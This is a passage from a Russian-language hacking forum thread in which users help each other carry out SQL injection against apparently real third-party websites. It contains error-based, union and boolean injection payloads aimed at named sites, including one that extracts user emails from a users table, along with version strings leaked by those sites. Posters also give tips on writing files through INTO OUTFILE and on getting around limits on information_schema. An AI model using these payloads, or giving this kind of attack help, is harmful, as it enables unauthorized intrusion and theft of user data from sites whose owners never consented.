я пробовал уже) лил в папки которые доступны для записи... ноль эффекта. прочитал php.ini magic_quotes=off так что кавычки врятли тут роль играют)
сам пост/гет параметр можешь вызвать php ошибку, я не про фильтр говорю Откуда ты узнал, что папки доступны на запись?
Ну вообще прочитал скрипт для залития изображений из админки. там четко написанно что картинки и файлы будут заливатся в ту папку( ну и сообственно в папке этой куча грязи всякой) Ну а вообще я редко раньше встречал что бы /tmp/ была закрыта на запись) Поможешь в аське если есть время конешно, не хочу тут позорится просто : ))
пиши в асю гляну, права mysql могут отличасть от php, и там где может залить пхп скрипт, мускул может не залить файл!
может быть она просто выключена? по дефолту, обычно, вкл. присутствует в 5.7 и ниже http://dev.mysql.com/doc/refman/5.7/en/load-data.html
ребята кто знает как определить имя таблицы в sql инъекции error-based ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema Code: &orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version()))) но продвинутся дальше не получается не знаю префикса названия таблиц вопрос как вызвать ошибку с названием таблицы в ней?
select table_name from information_schema.tables limit 1,1 вместо select version() с такими вопросами вам лучше сначала почитать статьи
Ну во первых, как советуют выкинь Хавидж и сделай вручную. К тому же переведи в HEX колонку к виду 0x0000000 и SELECT 0x0000 INTO OUTFILE /path К тому-же, tmp это который /tmp в корне сервера или в локации вебкорня? Тот что в корне сервера, на самом деле для всех должен быть доступен на запись, а вот любые, даже кешевые и тп директории внутри вебкорня для отличных от пользователя под которым работает php(etc) могут иметь права строго ограничивающие доступ
+ к посту YaBtr Заменяем пробелы на %20 Union Based http://www.favorite-picture.com/pictures/search/ffffff')and(1)=2%20order%20by%203%23.html http://www.favorite-picture.com/pictures/search/miss')and(1)=1%20union%20select%20@@version,222%23.html Boolean Based http://www.favorite-picture.com/pictures/search/ffffff')and(1='1.html http://www.favorite-picture.com/pictures/search/ffffff')and(1)=1%23.html Error Based Classic http://www.favorite-picture.com/pictures/search/miss')or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))%23.html Duplicate entry '5.5.38-0+wheezy11'
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
Во первых попробовать так: `information_schema`.xxx. Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema
Code: http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27 Там parameter length constraint mechanism. Как обойти для вывода?
чтобы не мучаться с этим, есть еще post sqli в форме входа http://hollywoodnewswire.net/scripts/login.php тогда вспоминайте, мне данные способы неизвестны.
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
Есть запрос " Code: /ru/users/?brands%5B%5D=9+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cusers.email%2C0x27%2C0x7e%29+from+%60dbname%60.users+Order+by+id+limit+4%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 выводит: Code: Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row' in / куда копать?
